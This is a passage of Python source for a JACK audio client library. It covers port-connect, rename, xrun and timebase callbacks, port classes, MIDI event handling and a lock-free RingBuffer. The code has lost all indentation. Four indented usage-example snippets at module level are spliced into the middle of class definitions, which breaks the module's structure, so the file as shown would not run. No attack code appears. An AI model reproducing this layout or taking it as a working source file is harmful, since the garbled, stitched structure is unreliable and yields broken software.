the callback not to be called if *only_available* is
``True``, or called with ``None`` as first argument (see
below).
To avoid this, call `Client.get_ports()` just after
`activate()`, allowing the module to store pointers to
already existing ports and always receive a `Port`
argument for this callback.
Parameters
----------
callback : callable
User-supplied function that is called whenever a port is
connected or disconnected. It must have this signature::
callback(a: Port, b: Port, connect: bool) -> None
The first and second arguments contain `Port`, `MidiPort`,
`OwnPort` or `OwnMidiPort` objects of the ports which are
connected or disconnected. The third argument is ``True``
if the ports were connected and ``False`` if the ports were
disconnected.
.. note:: Same as with most callbacks, no functions that
interact with the JACK daemon should be used here.
only_available : bool, optional
See `set_port_registration_callback()`.
If ``False``, the first and/or the second argument to the
*callback* may be ``None``.
See Also
--------
Client.connect, OwnPort.connect
"""
if callback is None:
return lambda cb: self.set_port_connect_callback(
cb, only_available)
@self._callback('JackPortConnectCallback')
def callback_wrapper(a, b, connect, _):
port_ids = a, b
ports = [None, None]
for idx in 0, 1:
ptr = _lib.jack_port_by_id(self._ptr, port_ids[idx])
if ptr:
ports[idx] = self._wrap_port_ptr(ptr)
elif only_available:
return
else:
pass # Do nothing, port is already None
callback(ports[0], ports[1], bool(connect))
_check(_lib.jack_set_port_connect_callback(
self._ptr, callback_wrapper, _ffi.NULL),
'Error setting port connect callback')
def set_port_rename_callback(self, callback=None, only_available=True):
"""Register port rename callback.
Tell the JACK server to call *callback* whenever a port is
renamed.
All "notification events" are received in a separated non RT
thread, the code in the supplied function does not need to be
suitable for real-time execution.
.. note:: This function cannot be called while the client is
activated (after `activate()` has been called).
Parameters
----------
callback : callable
User-supplied function that is called whenever the port name
has been changed. It must have this signature::
callback(port: Port, old: str, new: str) -> None
The first argument is the port that has been renamed (a
`Port`, `MidiPort`, `OwnPort` or `OwnMidiPort` object); the
second and third arguments are the old and new names,
respectively. The *callback* is supposed to raise
`CallbackExit` on error.
.. note:: Same as with most callbacks, no functions that
interact with the JACK daemon should be used here.
only_available : bool, optional
See `set_port_registration_callback()`.
See Also
--------
:attr:`Port.shortname`
Notes
-----
The port rename callback is not available in JACK 1!
See `this mailing list posting`__ and `this commit message`__.
__ http://comments.gmane.org/gmane.comp.audio.jackit/28888
__ https://github.com/jackaudio/jack1/commit/
94c819accfab2612050e875c24cf325daa0fd26d
"""
if callback is None:
return lambda cb: self.set_port_rename_callback(cb, only_available)
@self._callback('JackPortRenameCallback', error=_FAILURE)
def callback_wrapper(port_id, old_name, new_name, _):
port_ptr = _lib.jack_port_by_id(self._ptr, port_id)
if port_ptr:
port = self._wrap_port_ptr(port_ptr)
elif only_available:
return
else:
port = None
try:
callback(port, _ffi.string(old_name).decode(),
_ffi.string(new_name).decode())
except CallbackExit:
return _FAILURE
return _SUCCESS
_check(_lib.jack_set_port_rename_callback(
self._ptr, callback_wrapper, _ffi.NULL),
'Error setting port rename callback')
def set_graph_order_callback(self, callback):
"""Register graph order callback.
Tell the JACK server to call *callback* whenever the processing
graph is reordered.
All "notification events" are received in a separated non RT
thread, the code in the supplied function does not need to be
suitable for real-time execution.
.. note:: This function cannot be called while the client is
activated (after :meth:`activate` has been called).
Parameters
----------
callback : callable
User-supplied function that is called whenever the
processing graph is reordered.
It must have this signature::
callback() -> None
The *callback* is supposed to raise `CallbackExit` on error.
.. note:: Same as with most callbacks, no functions that
interact with the JACK daemon should be used here.
"""
@self._callback('JackGraphOrderCallback', error=_FAILURE)
def callback_wrapper(_):
try:
callback()
except CallbackExit:
return _FAILURE
return _SUCCESS
_check(_lib.jack_set_graph_order_callback(
self._ptr, callback_wrapper, _ffi.NULL),
'Error setting graph order callback')
def set_xrun_callback(self, callback):
"""Register xrun callback.
Tell the JACK server to call *callback* whenever there is an
xrun.
All "notification events" are received in a separated non RT
thread, the code in the supplied function does not need to be
suitable for real-time execution.
.. note:: This function cannot be called while the client is
activated (after `activate()` has been called).
Parameters
----------
callback : callable
User-supplied function that is called whenever an xrun has
occurred. It must have this signature::
callback(delayed_usecs: float) -> None
The callback argument is the delay in microseconds due to
the most recent XRUN occurrence.
The *callback* is supposed to raise `CallbackExit` on error.
.. note:: Same as with most callbacks, no functions that
interact with the JACK daemon should be used here.
"""
@self._callback('JackXRunCallback', error=_FAILURE)
def callback_wrapper(_):
try:
callback(_lib.jack_get_xrun_delayed_usecs(self._ptr))
except CallbackExit:
return _FAILURE
return _SUCCESS
_check(_lib.jack_set_xrun_callback(
self._ptr, callback_wrapper, _ffi.NULL),
'Error setting xrun callback')
def set_timebase_callback(self, callback=None, conditional=False):
"""Register as timebase master for the JACK subsystem.
The timebase master registers a callback that updates extended
position information such as beats or timecode whenever
necessary. Without this extended information, there is no need
for this function.
There is never more than one master at a time. When a new
client takes over, the former callback is no longer called.
Taking over the timebase may be done conditionally, so that
*callback* is not registered if there was a master already.
Parameters
----------
callback : callable
Realtime function that returns extended position
information. Its output affects all of the following
process cycle. This realtime function must not wait.
It is called immediately after the process callback (see
`set_process_callback()`) in the same thread whenever the
transport is rolling, or when any client has requested a new
position in the previous cycle. The first cycle after
`set_timebase_callback()` is also treated as a new position,
or the first cycle after `activate()` if the client had been
inactive. The *callback* must have this signature::
callback(state: int, blocksize: int, pos: jack_position_t, new_pos: bool) -> None
state
The current transport state. See `transport_state`.
blocksize
The number of frames in the current period.
See `blocksize`.
pos
The position structure for the next cycle; ``pos.frame``
will be its frame number. If *new_pos* is ``False``,
this structure contains extended position information
from the current cycle. If *new_pos* is ``True``, it
contains whatever was set by the requester.
The *callback*'s task is to update the extended
information here. See `transport_query_struct()`
for details about ``jack_position_t``.
new_pos
``True`` for a newly requested *pos*, or for the first
cycle after the timebase callback is defined.
.. note:: The *pos* argument must not be used to set
``pos.frame``. To change position, use
`transport_reposition_struct()` or `transport_locate()`.
These functions are realtime-safe, the timebase callback
can call them directly.
conditional : bool
Set to ``True`` for a conditional request.
Returns
-------
bool
``True`` if the timebase callback was registered.
``False`` if a conditional request failed because another
timebase master is already registered.
"""
if callback is None:
return lambda cb: self.set_timebase_callback(cb, conditional)
@self._callback('JackTimebaseCallback')
def callback_wrapper(state, blocksize, pos, new_pos, _):
callback(state, blocksize, pos, bool(new_pos))
err = _lib.jack_set_timebase_callback(self._ptr, conditional,
callback_wrapper, _ffi.NULL)
# Because of a bug in JACK2 version <= 1.9.10, we also check for -1.
# See https://github.com/jackaudio/jack2/pull/123
if conditional and err in (_errno.EBUSY, -1):
return False
_check(err, 'Error setting timebase callback')
return True
def get_uuid_for_client_name(self, name):
"""Get the session ID for a client name.
The session manager needs this to reassociate a client name to
the session ID.
"""
uuid = _ffi.gc(_lib.jack_get_uuid_for_client_name(
self._ptr, name.encode()), _lib.jack_free)
if not uuid:
raise JackError('Unable to get session ID for {0!r}'.format(name))
return _ffi.string(uuid).decode()
def get_client_name_by_uuid(self, uuid):
"""Get the client name for a session ID.
In order to snapshot the graph connections, the session manager
needs to map session IDs to client names.
"""
name = _ffi.gc(_lib.jack_get_client_name_by_uuid(
self._ptr, uuid.encode()), _lib.jack_free)
if not name:
raise JackError('Unable to get client name for {0!r}'.format(uuid))
return _ffi.string(name).decode()
def get_port_by_name(self, name):
"""Get port by name.
Given a full port name, this returns a `Port`, `MidiPort`,
`OwnPort` or `OwnMidiPort` object.
"""
port_ptr = _lib.jack_port_by_name(self._ptr, name.encode())
if not port_ptr:
raise JackError('Port {0!r} not available'.format(name))
return self._wrap_port_ptr(port_ptr)
def get_all_connections(self, port):
"""Return a list of ports which the given port is connected to.
This differs from `OwnPort.connections` (also available on
`OwnMidiPort`) in two important respects:
1) You may not call this function from code that is executed in
response to a JACK event. For example, you cannot use it in a
graph order callback.
2) You need not be the owner of the port to get information
about its connections.
"""
port = self._get_port_ptr(port)
names = _ffi.gc(_lib.jack_port_get_all_connections(self._ptr, port),
_lib.jack_free)
return self._port_list_from_pointers(names)
def get_ports(self, name_pattern='', is_audio=False, is_midi=False,
is_input=False, is_output=False, is_physical=False,
can_monitor=False, is_terminal=False):
"""Return a list of selected ports.
Parameters
----------
name_pattern : str
A regular expression used to select ports by name. If
empty, no selection based on name will be carried out.
is_audio, is_midi : bool
Select audio/MIDI ports. If neither of them is ``True``,
both types of ports are selected.
is_input, is_output, is_physical, can_monitor, is_terminal : bool
Select ports by their flags. If none of them are ``True``,
no selection based on flags will be carried out.
Returns
-------
list of Port/MidiPort/OwnPort/OwnMidiPort
All ports that satisfy the given conditions.
"""
if is_audio and not is_midi:
type_pattern = _AUDIO
elif is_midi and not is_audio:
type_pattern = _MIDI
else:
type_pattern = b''
flags = 0x0
if is_input:
flags |= _lib.JackPortIsInput
if is_output:
flags |= _lib.JackPortIsOutput
if is_physical:
flags |= _lib.JackPortIsPhysical
if can_monitor:
flags |= _lib.JackPortCanMonitor
if is_terminal:
flags |= _lib.JackPortIsTerminal
names = _ffi.gc(_lib.jack_get_ports(
self._ptr, name_pattern.encode(), type_pattern, flags),
_lib.jack_free)
return self._port_list_from_pointers(names)
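# --- Example (hedged): finding physical playback ports with get_ports() ---
# Physical *playback* ports are inputs from the graph's point of view, hence
# is_physical=True, is_input=True.  Assumes a running server with audio I/O.
import jack

client = jack.Client('autoconnect_example')
out = client.outports.register('out_1')
client.activate()
targets = client.get_ports(is_physical=True, is_input=True, is_audio=True)
if targets:
    client.connect(out, targets[0])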
def _callback(self, cdecl, **kwargs):
"""Wrapper for ffi.callback() that keeps callback alive."""
def callback_decorator(python_callable):
function_ptr = _ffi.callback(cdecl, python_callable, **kwargs)
self._keepalive.append(function_ptr)
return function_ptr
return callback_decorator
def _register_port(self, name, porttype, is_terminal, is_physical, flags):
"""Create a new port."""
if is_terminal:
flags |= _lib.JackPortIsTerminal
if is_physical:
flags |= _lib.JackPortIsPhysical
port_ptr = _lib.jack_port_register(self._ptr, name.encode(), porttype,
flags, 0)
if not port_ptr:
raise JackError(
'{0!r}: port registration failed'.format(name))
return self._wrap_port_ptr(port_ptr)
def _port_list_from_pointers(self, names):
"""Get list of Port objects from char**."""
ports = []
if names:
idx = 0
while True:
name = names[idx]
if not name:
break
ports.append(self.get_port_by_name(_ffi.string(name).decode()))
idx += 1
return ports
def _get_port_ptr(self, port):
"""Get port pointer from Port object or string or port pointer."""
if isinstance(port, Port):
port = port._ptr
elif isinstance(port, str):
port = self.get_port_by_name(port)._ptr
return port
def _wrap_port_ptr(self, ptr):
"""Create appropriate port object for a given port pointer."""
porttype = _ffi.string(_lib.jack_port_type(ptr))
if porttype == _AUDIO:
port = OwnPort(ptr, self) if self.owns(ptr) else Port(ptr)
elif porttype == _MIDI:
port = OwnMidiPort(ptr, self) if self.owns(ptr) else MidiPort(ptr)
else:
assert False
return port
class Port(object):
"""A JACK audio port.
This class cannot be instantiated directly. Instead, instances of
this class are returned from `Client.get_port_by_name()`,
`Client.get_ports()`, `Client.get_all_connections()` and
`OwnPort.connections`.
In addition, instances of this class are available in the callbacks
which are set with `Client.set_port_registration_callback()`,
`Client.set_port_connect_callback()` or
`Client.set_port_rename_callback`.
Note, however, that if the used `Client` owns the respective port,
instances of `OwnPort` (instead of `Port`) will be created. In case
of MIDI ports, instances of `MidiPort` or `OwnMidiPort` are created.
Besides being the type of non-owned JACK audio ports, this class
also serves as base class for all other port classes (`OwnPort`,
`MidiPort` and `OwnMidiPort`).
New JACK audio/MIDI ports can be created with the
:meth:`~Ports.register` method of `Client.inports`,
`Client.outports`, `Client.midi_inports` and `Client.midi_outports`.
"""
def __init__(self, port_ptr):
self._ptr = port_ptr
def __repr__(self):
return "jack.{0.__class__.__name__}('{0.name}')".format(self)
def __eq__(self, other):
"""Ports are equal if their underlying port pointers are."""
return self._ptr == other._ptr
def __ne__(self, other):
"""This should be implemented whenever __eq__() is implemented."""
return not self.__eq__(other)
@property
def name(self):
"""Full name of the JACK port (read-only)."""
return _ffi.string(_lib.jack_port_name(self._ptr)).decode()
@property
def shortname(self):
"""Short name of the JACK port, not including the client name.
Must be unique among all ports owned by a client.
May be modified at any time. If the resulting full name
(including the ``client_name:`` prefix) is longer than
`port_name_size()`, it will be truncated.
"""
return _ffi.string(_lib.jack_port_short_name(self._ptr)).decode()
@shortname.setter
def shortname(self, shortname):
_check(_lib.jack_port_set_name(self._ptr, shortname.encode()),
'Error setting port name')
@property
def aliases(self):
"""Returns a list of strings with the aliases for the JACK port."""
ctype = "char[{}]".format(_lib.jack_port_name_size())
aliases = [_ffi.new(ctype), _ffi.new(ctype)]
aliasesptr = _ffi.new("char *[]", aliases)
result = []
if _lib.jack_port_get_aliases(self._ptr, aliasesptr) > 0:
for i in 0, 1:
alias = _ffi.string(aliases[i]).decode()
if alias:
result.append(alias)
return result
def set_alias(self, alias):
"""Set an alias for the JACK port.
Ports can have up to two aliases. If both are already set,
this function will return an error.
"""
_check(_lib.jack_port_set_alias(self._ptr, alias.encode()),
'Error setting port alias')
def unset_alias(self, alias):
"""Remove an alias for the JACK port.
If the alias doesn't exist this function will return an error.
"""
_check(_lib.jack_port_unset_alias(self._ptr, alias.encode()),
'Error unsetting port alias')
@property
def uuid(self):
"""The UUID of the JACK port."""
return _lib.jack_port_uuid(self._ptr)
is_audio = property(lambda self: True, doc='This is always ``True``.')
is_midi = property(lambda self: False, doc='This is always ``False``.')
@property
def is_input(self):
"""Can the port receive data?"""
return self._hasflag(_lib.JackPortIsInput)
@property
def is_output(self):
"""Can data be read from this port?"""
return self._hasflag(_lib.JackPortIsOutput)
@property
def is_physical(self):
"""Does it correspond to some kind of physical I/O connector?"""
return self._hasflag(_lib.JackPortIsPhysical)
@property
def can_monitor(self):
"""Does a call to `request_monitor()` make sense?"""
return self._hasflag(_lib.JackPortCanMonitor)
@property
def is_terminal(self):
"""Is the data consumed/generated?"""
return self._hasflag(_lib.JackPortIsTerminal)
def request_monitor(self, onoff):
"""Set input monitoring.
If `can_monitor` is ``True``, turn input monitoring on or
off. Otherwise, do nothing.
Parameters
----------
onoff : bool
If ``True``, switch monitoring on; if ``False``, switch it
off.
"""
_check(_lib.jack_port_request_monitor(self._ptr, onoff),
'Unable to switch monitoring on/off')
def _hasflag(self, flag):
"""Helper method for is_*()."""
return bool(_lib.jack_port_flags(self._ptr) & flag)
class MidiPort(Port):
"""A JACK MIDI port.
This class is derived from `Port` and has exactly the same
attributes and methods.
This class cannot be instantiated directly (see `Port`).
New JACK audio/MIDI ports can be created with the
:meth:`~Ports.register` method of `Client.inports`,
`Client.outports`, `Client.midi_inports` and `Client.midi_outports`.
See Also
--------
Port, OwnMidiPort
"""
is_audio = property(lambda self: False, doc='This is always ``False``.')
is_midi = property(lambda self: True, doc='This is always ``True``.')
class OwnPort(Port):
"""A JACK audio port owned by a `Client`.
This class is derived from `Port`. `OwnPort` objects can do
everything that `Port` objects can, plus a lot more.
This class cannot be instantiated directly (see `Port`).
New JACK audio/MIDI ports can be created with the
:meth:`~Ports.register` method of `Client.inports`,
`Client.outports`, `Client.midi_inports` and `Client.midi_outports`.
"""
def __init__(self, port_ptr, client):
Port.__init__(self, port_ptr)
self._client = client
@property
def number_of_connections(self):
"""Number of connections to or from port."""
return _lib.jack_port_connected(self._ptr)
@property
def connections(self):
"""List of ports which the port is connected to."""
names = _ffi.gc(_lib.jack_port_get_connections(self._ptr),
_lib.jack_free)
return self._client._port_list_from_pointers(names)
def is_connected_to(self, port):
"""Am I *directly* connected to *port*?
Parameters
----------
port : str or Port
Full port name or port object.
"""
if isinstance(port, Port):
port = port.name
return bool(_lib.jack_port_connected_to(self._ptr, port.encode()))
def connect(self, port):
"""Connect to given port.
Parameters
----------
port : str or Port
Full port name or port object.
See Also
--------
Client.connect
"""
if not isinstance(port, Port):
port = self._client.get_port_by_name(port)
if self.is_output:
source = self
if not port.is_input:
raise ValueError('Input port expected')
destination = port
elif self.is_input:
destination = self
if not port.is_output:
raise ValueError('Output port expected')
source = port
else:
assert False
self._client.connect(source.name, destination.name)
def disconnect(self, other=None):
"""Disconnect this port.
Parameters
----------
other : str or Port
Port to disconnect from.
By default, disconnect from all connected ports.
"""
if other is None:
_check(_lib.jack_port_disconnect(self._client._ptr, self._ptr),
'Error disconnecting {0!r}'.format(self.name))
else:
if self.is_output:
args = self, other
elif self.is_input:
args = other, self
self._client.disconnect(*args)
def unregister(self):
"""Unregister port.
Remove the port from the client, disconnecting any existing
connections. This also removes the port from
`Client.inports`, `Client.outports`, `Client.midi_inports` or
`Client.midi_outports`.
"""
if self.is_audio:
listname = ''
elif self.is_midi:
listname = 'midi_'
if self.is_input:
listname += 'inports'
elif self.is_output:
listname += 'outports'
ports = getattr(self._client, listname)
ports._portlist.remove(self)
_check(_lib.jack_port_unregister(self._client._ptr, self._ptr),
'Error unregistering {0!r}'.format(self.name))
def get_buffer(self):
"""Get buffer for audio data.
This returns a buffer holding the memory area associated with
the specified port. For an output port, it will be a memory
area that can be written to; for an input port, it will be an
area containing the data from the port's connection(s), or
zero-filled. If there are multiple inbound connections, the
data will be mixed appropriately.
Caching output ports is DEPRECATED in JACK 2.0, due to some new
optimization (like "pipelining"). Port buffers have to be
retrieved in each callback for proper functioning.
This method shall only be called from within the process
callback (see `Client.set_process_callback()`).
"""
blocksize = self._client.blocksize
return _ffi.buffer(_lib.jack_port_get_buffer(self._ptr, blocksize),
blocksize * _ffi.sizeof('float'))
def get_array(self):
"""Get audio buffer as NumPy array.
Make sure to ``import numpy`` before calling this, otherwise the
first call might take a long time.
This method shall only be called from within the process
callback (see `Client.set_process_callback()`).
See Also
--------
get_buffer
"""
import numpy as np
return np.frombuffer(self.get_buffer(), dtype=np.float32)
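# --- Example (hedged): NumPy-based processing with get_array() ---
# Applies a fixed gain to one channel inside the process callback.  Sketch
# only; assumes NumPy is installed and a running JACK server.
import numpy as np
import jack

client = jack.Client('gain_example')
inp = client.inports.register('in_1')
outp = client.outports.register('out_1')
gain = 0.5

@client.set_process_callback
def process(frames):
    outp.get_array()[:] = gain * inp.get_array()

with client:
    input('press Return to quit\n')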
class OwnMidiPort(MidiPort, OwnPort):
"""A JACK MIDI port owned by a `Client`.
This class is derived from `OwnPort` and `MidiPort`, which are
themselves derived from `Port`. It has the same attributes and
methods as `OwnPort`, but `get_buffer()` and `get_array()` are
disabled. Instead, it has methods for sending and receiving MIDI
events (to be used only from within the process callback -- see
`Client.set_process_callback()`).
This class cannot be instantiated directly (see `Port`).
New JACK audio/MIDI ports can be created with the
:meth:`~Ports.register` method of `Client.inports`,
`Client.outports`, `Client.midi_inports` and `Client.midi_outports`.
"""
def __init__(self, *args, **kwargs):
OwnPort.__init__(self, *args, **kwargs)
self._event = _ffi.new('jack_midi_event_t*')
def get_buffer(self):
"""Not available for MIDI ports."""
raise NotImplementedError('get_buffer() not available on MIDI ports')
def get_array(self):
"""Not available for MIDI ports."""
raise NotImplementedError('get_array() not available on MIDI ports')
@property
def max_event_size(self):
"""Get the size of the largest event that can be stored by the port.
This returns the current space available, taking into
account events already stored in the port.
"""
return _lib.jack_midi_max_event_size(
_lib.jack_port_get_buffer(self._ptr, self._client.blocksize))
@property
def lost_midi_events(self):
"""Get the number of events that could not be written to the port.
A non-zero value implies that the port is full.
Currently the only way this can happen is if events are lost on
port mixdown.
"""
return _lib.jack_midi_get_lost_event_count(
_lib.jack_port_get_buffer(self._ptr, self._client.blocksize))
def incoming_midi_events(self):
"""Return generator for incoming MIDI events.
JACK MIDI is normalised, so the MIDI events yielded by this
generator are guaranteed to be complete MIDI events (the status
byte will always be present, and no realtime events will be
interspersed with the events).
Yields
------
time : int
Time (in samples) relative to the beginning of the current
audio block.
event : buffer
The actual MIDI event data.
"""
event = self._event
buf = _lib.jack_port_get_buffer(self._ptr, self._client.blocksize)
for i in range(_lib.jack_midi_get_event_count(buf)):
err = _lib.jack_midi_event_get(event, buf, i)
# TODO: proper error handling if this ever happens:
assert not err, err
yield event.time, _ffi.buffer(event.buffer, event.size)
def clear_buffer(self):
"""Clear an event buffer.
This should be called at the beginning of each process cycle
before calling `reserve_midi_event()` or `write_midi_event()`.
This function may not be called on an input port.
"""
_lib.jack_midi_clear_buffer(
_lib.jack_port_get_buffer(self._ptr, self._client.blocksize))
def write_midi_event(self, time, event):
"""Create an outgoing MIDI event.
Clients must write normalised MIDI data to the port - no running
status and no (one-byte) realtime messages interspersed with
other messages (realtime messages are fine when they occur on
their own, like other messages).
Events must be written in order, sorted by their sample offsets.
JACK will not sort the events for you, and will refuse to store
out-of-order events.
Parameters
----------
time : int
Time (in samples) relative to the beginning of the current
audio block.
event : bytes or buffer or sequence of int
The actual MIDI event data.
.. note:: Buffer objects are only supported for CFFI >= 0.9.
Raises
------
JackError
If MIDI event couldn't be written.
"""
try:
event = _ffi.from_buffer(event)
except AttributeError:
pass # from_buffer() not supported
except TypeError:
pass # input is not a buffer
_check(_lib.jack_midi_event_write(
_lib.jack_port_get_buffer(self._ptr, self._client.blocksize),
time, event, len(event)), 'Error writing MIDI event')
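# --- Example (hedged): MIDI pass-through in the process callback ---
# Mirrors the documented pattern: clear the output buffer first, then copy
# every incoming event.  Assumes a running JACK server; names are arbitrary.
import jack

client = jack.Client('midi_thru_example')
midi_in = client.midi_inports.register('input')
midi_out = client.midi_outports.register('output')

@client.set_process_callback
def process(frames):
    midi_out.clear_buffer()
    for offset, data in midi_in.incoming_midi_events():
        midi_out.write_midi_event(offset, data)

with client:
    input('press Return to quit\n')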
def reserve_midi_event(self, time, size):
"""Get a buffer where an outgoing MIDI event can be written to.
Clients must write normalised MIDI data to the port - no running
status and no (one-byte) realtime messages interspersed with
other messages (realtime messages are fine when they occur on
their own, like other messages).
Events must be written in order, sorted by their sample offsets.
JACK will not sort the events for you, and will refuse to store
out-of-order events.
Parameters
----------
time : int
Time (in samples) relative to the beginning of the current
audio block.
size : int
Number of bytes to reserve.
Returns
-------
buffer
A buffer object where MIDI data bytes can be written to.
If no space could be reserved, an empty buffer is returned.
"""
buf = _lib.jack_midi_event_reserve(
_lib.jack_port_get_buffer(self._ptr, self._client.blocksize),
time, size)
return _ffi.buffer(buf, size if buf else 0)
class Ports(object):
"""A list of input/output ports.
This class is not meant to be instantiated directly. It is only
used as `Client.inports`, `Client.outports`, `Client.midi_inports`
and `Client.midi_outports`.
The ports can be accessed by indexing or by iteration.
New ports can be added with `register()`, existing ports can be
removed by calling their :meth:`~OwnPort.unregister` method.
"""
def __init__(self, client, porttype, flag):
self._client = client
self._type = porttype
self._flag = flag
self._portlist = []
def __len__(self):
return self._portlist.__len__()
def __getitem__(self, name):
return self._portlist.__getitem__(name)
# No __setitem__!
def __iter__(self):
return self._portlist.__iter__()
def __repr__(self):
return self._portlist.__repr__()
def register(self, shortname, is_terminal=False, is_physical=False):
"""Create a new input/output port.
The new `OwnPort` or `OwnMidiPort` object is automatically added
to `Client.inports`, `Client.outports`, `Client.midi_inports` or
`Client.midi_outports`.
Parameters
----------
shortname : str
Each port has a short name. The port's full name contains
the name of the client concatenated with a colon (:)
followed by its short name. The `port_name_size()` is the
maximum length of this full name. Exceeding that will cause
the port registration to fail.
The port name must be unique among all ports owned by this
client.
If the name is not unique, the registration will fail.
is_terminal : bool
For an input port: If ``True``, the data received by the
port will not be passed on or made available at any other
port.
For an output port: If ``True``, the data available at the
port does not originate from any other port.
Audio synthesizers, I/O hardware interface clients, HDR
systems are examples of clients that would set this flag for
their ports.
is_physical : bool
If ``True`` the port corresponds to some kind of physical
I/O connector.
Returns
-------
Port
A new `OwnPort` or `OwnMidiPort` instance.
"""
port = self._client._register_port(
shortname, self._type, is_terminal, is_physical, self._flag)
self._portlist.append(port)
return port
def clear(self):
"""Unregister all ports in the list.
See Also
--------
OwnPort.unregister
"""
while self._portlist:
self._portlist[0].unregister()
class RingBuffer(object):
"""JACK's lock-free ringbuffer."""
def __init__(self, size):
"""Create a lock-free ringbuffer.
A ringbuffer is a good way to pass data between threads
(e.g. between the main program and the process callback),
when streaming realtime data to slower media, like audio file
playback or recording.
The key attribute of a ringbuffer is that it can be safely
accessed by two threads simultaneously -- one reading from the
buffer and the other writing to it -- without using any
synchronization or mutual exclusion primitives. For this to
work correctly, there can only be a single reader and a single
writer thread. Their identities cannot be interchanged.
Parameters
----------
size : int
Size in bytes. JACK will allocate a buffer of at least this
size (rounded up to the next power of 2), but one byte is
reserved for internal use. Use `write_space` to
determine the actual size available for writing.
"""
ptr = _lib.jack_ringbuffer_create(size)
if not ptr:
raise JackError('Could not create RingBuffer')
self._ptr = _ffi.gc(ptr, _lib.jack_ringbuffer_free)
@property
def write_space(self):
"""The number of bytes available for writing."""
return _lib.jack_ringbuffer_write_space(self._ptr)
def write(self, data):
"""Write data into the ringbuffer.
Parameters
----------
data : buffer or bytes or iterable of int
Bytes to be written to the ringbuffer.
Returns
-------
int
The number of bytes written, which could be less than the
length of *data* if there was no more space left
(see `write_space`).
See Also
--------
:attr:`write_space`, :attr:`write_buffers`
"""
try:
data = _ffi.from_buffer(data)
except AttributeError:
pass # from_buffer() not supported
except TypeError:
pass # input is not a buffer
return _lib.jack_ringbuffer_write(self._ptr, data, len(data))
@property
def write_buffers(self):
"""Contains two buffer objects that can be written to directly.
Two are needed because the space available for writing may be
split across the end of the ringbuffer. Either of them could be
0 length.
This can be used as a no-copy version of `write()`.
When finished with writing, `write_advance()` should be used.
.. note:: After an operation that changes the write pointer
(`write()`, `write_advance()`, `reset()`), the buffers are no
longer valid and one should use this property again to get
new ones.
"""
vectors = _ffi.new('jack_ringbuffer_data_t[2]')
_lib.jack_ringbuffer_get_write_vector(self._ptr, vectors)
return (
_ffi.buffer(vectors[0].buf, vectors[0].len),
_ffi.buffer(vectors[1].buf, vectors[1].len)
)
def write_advance(self, size):
"""Advance the write pointer.
After data has been written to the ringbuffer using
`write_buffers`, use this method to advance the buffer pointer,
making the data available for future read operations.
Parameters
----------
size : int
The number of bytes to advance.
"""
_lib.jack_ringbuffer_write_advance(self._ptr, size)
@property
def read_space(self):
"""The number of bytes available for reading."""
return _lib.jack_ringbuffer_read_space(self._ptr)
def read(self, size):
"""Read data from the ringbuffer.
Parameters
----------
size : int
Number of bytes to read.
Returns
-------
buffer
A buffer object containing the requested data.
If no more data is left (see `read_space`), a smaller
(or even empty) buffer is returned.
See Also
--------
peek, :attr:`read_space`, :attr:`read_buffers`
"""
data = _ffi.new('unsigned char[]', size)
size = _lib.jack_ringbuffer_read(self._ptr, data, size)
return _ffi.buffer(data, size)
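# --- Example (hedged): basic RingBuffer usage ---
# Standalone sketch of the write/read API.  In a real client, one thread
# (e.g. the process callback) writes while another thread reads -- exactly
# one writer and one reader, as documented above.
import jack

rb = jack.RingBuffer(1024)        # >= 1024 bytes allocated, one byte reserved
print(rb.write_space)             # space actually available for writing
written = rb.write(b'hello')      # returns the number of bytes written
print(written, rb.read_space)     # 5 5
print(bytes(rb.read(5)))          # b'hello'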
def peek(self, size):
"""Peek at data from the ringbuffer.
As opposed to `read()`, this function does not move the read
pointer, so it is a convenient way to inspect data in the
ringbuffer in a continuous fashion.
The price is that the data is copied into a newly allocated
buffer. For "raw" non-copy inspection of the data in the
ringbuffer use `read_buffers`.
Parameters
----------
size : int
Number of bytes to peek.
Returns
-------
buffer
A buffer object containing the requested data.
If no more data is left (see `read_space`), a smaller
(or even empty) buffer is returned.
See Also
--------
read, :attr:`read_space`, :attr:`read_buffers`
"""
data = _ffi.new('unsigned char[]', size)
size = _lib.jack_ringbuffer_peek(self._ptr, data, size)
return _ffi.buffer(data, size)
@property
def read_buffers(self):
"""Contains two buffer objects that can be read directly.
Two are needed because the data to be read may be split across
the end of the ringbuffer. Either of them could be 0 length.
This can be used as a no-copy version of `peek()` or `read()`.
When finished with reading, `read_advance()` should be used.
.. note:: After an operation that changes the read pointer
(`read()`, `read_advance()`, `reset()`), the buffers are no
longer valid and one should use this property again to get
new ones.
"""
vectors = _ffi.new('jack_ringbuffer_data_t[2]')
_lib.jack_ringbuffer_get_read_vector(self._ptr, vectors)
return (
_ffi.buffer(vectors[0].buf, vectors[0].len),
_ffi.buffer(vectors[1].buf, vectors[1].len)
)
def read_advance(self, size):
"""Advance the read pointer.
After data has been read from the ringbuffer using
`read_buffers` or `peek()`, use this method to advance the
buffer pointers, making that space available for future write
operations.
Parameters
----------
size : int
The number of bytes to advance.
"""
_lib.jack_ringbuffer_read_advance(self._ptr, size)
def mlock(self):
"""Lock a ringbuffer data block into memory.
Uses the ``mlock()`` system call. This prevents the
ringbuffer's memory from being paged to the swap area.
.. note:: This is not a realtime operation.
"""
_check(_lib.jack_ringbuffer_mlock(self._ptr),
'Error mlocking the RingBuffer data')
def reset(self, size=None):
"""Reset the read and write pointers, making an empty buffer.
.. note:: This is not thread safe.
Parameters
----------
size : int, optional
The new size for the ringbuffer.
Must be less than allocated size.
"""
if size is None:
_lib.jack_ringbuffer_reset(self._ptr)
else:
_lib.jack_ringbuffer_reset_size(self._ptr, size)
@property
def size(self):
"""The number of bytes in total used by the buffer.
See Also
--------
:attr:`read_space`, :attr:`write_space`
"""
return self._ptr.size
class Status(object):
"""Representation of the JACK status bits."""
__slots__ = '_code'
def __init__(self, code):
self._code = code
def __repr__(self):
flags = ', '.join(name for name in dir(self)
if not name.startswith('_') and getattr(self, name))
if not flags:
flags = 'no flags set'
return '<jack.Status 0x{0:X}: {1}>'.format(self._code, flags)
@property
def failure(self):
"""Overall operation failed."""
return self._hasflag(_lib.JackFailure)
@property
def invalid_option(self):
"""The operation contained an invalid or unsupported option."""
return self._hasflag(_lib.JackInvalidOption)
@property
def name_not_unique(self):
"""The desired client name was not unique.
With the *use_exact_name* option of `Client`, this situation is
fatal. Otherwise, the name is modified by appending a dash and
a two-digit number in the range "-01" to "-99". `Client.name`
will return the exact string that was used. If the specified
*name* plus these extra characters would be too long, the open
fails instead.
"""
return self._hasflag(_lib.JackNameNotUnique)
@property
def server_started(self):
"""The JACK server was started for this `Client`.
Otherwise, it was running already.
"""
